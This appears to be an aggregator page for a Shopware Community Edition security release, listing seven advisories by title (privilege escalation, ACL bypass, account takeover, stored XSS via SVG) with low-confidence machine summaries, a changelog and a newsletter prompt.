This release includes 7 security fixes for security teams reviewing exposed deployments.
Topics
+13 more
Affected surfaces
Summary
AI summaryUpdates https://github.com/shopware/shopware/security/advisories/GHSA-gv8p-48fr-4fxg, https://github.com/shopware/shopware/security/advisories/GHSA-8v9p-g828-v98f, and https://github.com/shopware/shopware/security/advisories/GHSA-7w52-7jvm-m9vw across a mixed release.
Changes in this release
| Type | Severity | Summary | CVE |
|---|---|---|---|
| Security | Medium |
GHSA-gv8p-48fr-4fxg fixes privilege escalation via Sync API Integration Admin Flag Bypass. GHSA-gv8p-48fr-4fxg fixes privilege escalation via Sync API Integration Admin Flag Bypass. Source: granite4.1:8b-q6_K@2026-05-19 Confidence: low |
— |
| Security | Medium |
GHSA-8v9p-g828-v98f mitigates admin account takeover via User Recovery Hash Exposure. GHSA-8v9p-g828-v98f mitigates admin account takeover via User Recovery Hash Exposure. Source: granite4.1:8b-q6_K@2026-05-19 Confidence: low |
— |
| Security | Medium |
GHSA-7w52-7jvm-m9vw prevents timing attack on admin panel for username enumeration. GHSA-7w52-7jvm-m9vw prevents timing attack on admin panel for username enumeration. Source: granite4.1:8b-q6_K@2026-05-19 Confidence: low |
— |
| Security | Medium |
GHSA-v39m-97p8-gqg7 resolves privilege escalation allowing non-admin user to create admin accounts. GHSA-v39m-97p8-gqg7 resolves privilege escalation allowing non-admin user to create admin accounts. Source: granite4.1:8b-q6_K@2026-05-19 Confidence: low |
— |
| Security | Medium |
GHSA-f8q6-3g5w-jjr6 fixes Admin API ACL bypass in Order State Transition Endpoints. GHSA-f8q6-3g5w-jjr6 fixes Admin API ACL bypass in Order State Transition Endpoints. Source: granite4.1:8b-q6_K@2026-05-19 Confidence: low |
— |
| Security | Medium |
GHSA-9v5m-39wh-5chq prevents unauthorized payment trigger for foreign orders via /store-api/handle-payment. GHSA-9v5m-39wh-5chq prevents unauthorized payment trigger for foreign orders via /store-api/handle-payment. Source: granite4.1:8b-q6_K@2026-05-19 Confidence: low |
— |
| Security | Medium |
GHSA-xvhc-gm7j-mhmc addresses stored XSS via SVG file upload due to lack of SVG sanitization. GHSA-xvhc-gm7j-mhmc addresses stored XSS via SVG file upload due to lack of SVG sanitization. Source: granite4.1:8b-q6_K@2026-05-19 Confidence: low |
— |
Full changelog
See the UPGRADE.md for all important technical changes.
- GHSA-gv8p-48fr-4fxg - Privilege Escalation via Sync API Integration Admin Flag Bypass
- GHSA-8v9p-g828-v98f - Admin Account Takeover via User Recovery Hash Exposure
- GHSA-7w52-7jvm-m9vw - Timing-attack on admin panel allowing enumeration of administrator usernames
- GHSA-v39m-97p8-gqg7 - Privilege escalation: non-admin user with user:create ACL can create admin accounts
- GHSA-f8q6-3g5w-jjr6 - Admin API ACL Bypass in Order State Transition Endpoints
- GHSA-9v5m-39wh-5chq - Unauthorized Payment Trigger for Foreign Orders via /store-api/handle-payment
- GHSA-xvhc-gm7j-mhmc - Stored XSS via SVG file upload - no SVG sanitization
Security Fixes
- GHSA-gv8p-48fr-4fxg – Privilege Escalation via Sync API Integration Admin Flag Bypass
- GHSA-8v9p-g828-v98f – Admin Account Takeover via User Recovery Hash Exposure
- GHSA-7w52-7jvm-m9vw – Timing‑attack on admin panel allowing enumeration of administrator usernames
- GHSA-v39m-97p8-gqg7 – Privilege escalation: non‑admin user with user:create ACL can create admin accounts
- GHSA-f8q6-3g5w-jjr6 – Admin API ACL Bypass in Order State Transition Endpoints
- GHSA-9v5m-39wh-5chq – Unauthorized Payment Trigger for Foreign Orders via /store-api/handle-payment
- GHSA-xvhc-gm7j-mhmc – Stored XSS via SVG file upload – no SVG sanitization
Weekly OSS security release digest.
The CVE patches and breaking changes that affected production tools this week. One email, every Sunday.
No spam, unsubscribe anytime.
Share this release
About Shopware Community Edition
PHP based open source e-commerce software made in Germany.
Related context
Beta — feedback welcome: [email protected]